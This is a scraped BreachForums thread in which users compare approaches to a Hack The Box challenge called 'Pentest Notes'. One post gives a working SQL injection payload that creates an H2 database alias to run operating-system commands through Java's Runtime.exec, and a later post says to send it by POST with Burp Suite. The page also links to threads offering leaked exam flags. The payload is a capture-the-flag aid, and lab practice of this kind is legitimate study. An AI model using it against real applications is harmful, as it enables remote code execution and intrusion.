JOIN BREACHFORUMS TELEGRAM
HTB Pentest Notes - Challenge
by StingEm - Saturday October 26, 2024 at 09:53 PM
GOD User
God
Posts: 75
Threads: 5
Joined: Sep 2024
Reputation: 62

GOD
#1
Oct 26, 2024, 09:53 PM
Has anyone started on Pentest Notes Challenge?  I am about to start on it shortly - anyone want to work together for a solve or give guidance? 
If so join along here.
Reply
Banned

Posts: 57
Threads: 0
Joined: Oct 2024
Reputation: 0
#2
Oct 29, 2024, 12:14 AM
I think LFI is the way for this box but I could be wrong and it could just be CLI Injection

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
GOD User
God
Posts: 75
Threads: 5
Joined: Sep 2024
Reputation: 62

GOD
#3
Oct 29, 2024, 05:00 PM
So - I went down a few Rabbit Holes and then been busy at work - I really have not gotten far on this yet. Has anyone been working on it - any incites?
Reply
Breached
Member
Posts: 43
Threads: 1
Joined: Oct 2023
Reputation: 0
#4
Oct 29, 2024, 06:45 PM
(Oct 29, 2024, 05:00 PM)G_Sibley Wrote: So - I went down a few Rabbit Holes and then been busy at work - I really have not gotten far on this yet. Has anyone been working on it - any incites?

First find SQL Injection. It is the right path. Did you already find it?
Reply
Breached
Member
Posts: 40
Threads: 2
Joined: Jan 2024
Reputation: 0
#5
Oct 29, 2024, 07:32 PM
its way easy too solve, just use java runtime execution through a SQL alias to list files.

Hidden Content
You must register or login to view this content.

you can thank me Wink
Reply
Elite User

Posts: 312
Threads: 7
Joined: Oct 2023
Reputation: 0
#6
Oct 29, 2024, 09:44 PM (This post was last modified: Oct 29, 2024, 10:04 PM by Art10n.)
thank you bro for sharing
(Oct 29, 2024, 07:32 PM)awwliveyet Wrote: its way easy too solve, just use java runtime execution through a SQL alias to list files.



you can thank me Wink

execve doesn't exists in H2 database
Reply
Elite User

Posts: 312
Threads: 7
Joined: Oct 2023
Reputation: 0
#7
Oct 29, 2024, 11:09 PM
(Oct 29, 2024, 09:44 PM)Art10n Wrote: thank you bro for sharing
(Oct 29, 2024, 07:32 PM)awwliveyet Wrote: its way easy too solve, just use java runtime execution through a SQL alias to list files.



you can thank me Wink

execve doesn't exists in H2 database


First you have to create the alias but you cannot use $$

SQL Injection' or 1=0; CREATE ALIAS EXECVE AS '
String execve(String cmd) throws java.io.IOException {
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : "";
}';-- -
Reply
Banned

Posts: 148
Threads: 12
Joined: Jan 2024
Reputation: 0
#8
Oct 30, 2024, 03:58 AM
Its giving 400 error when try to create and execute.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Compromised - Malware Logs
Reply
Elite User

Posts: 312
Threads: 7
Joined: Oct 2023
Reputation: 0
#9
Oct 30, 2024, 09:45 AM
Use it in the POST and with Burp Suite
Reply
Breached
Member
Posts: 22
Threads: 0
Joined: Jun 2024
Reputation: 1
#10
Oct 30, 2024, 07:36 PM
(Oct 30, 2024, 09:45 AM)Art10n Wrote: Use it in the POST and with Burp Suite

thank you mate!!!
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 376 93,740 1 hour ago
Last Post: Sukon
  [FREE] CPTS • CWES • CDSA • CWEE Exam Hint 3midjets 233 32,346 1 hour ago
Last Post: Sukon
  [FREE] CPTS 12 FLAGS pulsebreaker 74 2,369 1 hour ago
Last Post: Sukon
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 89 8,101 6 hours ago
Last Post: Xploitd
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 10 629 10 hours ago
Last Post: chufoni

Forum Jump:


 Users browsing this forum: 1 Guest(s)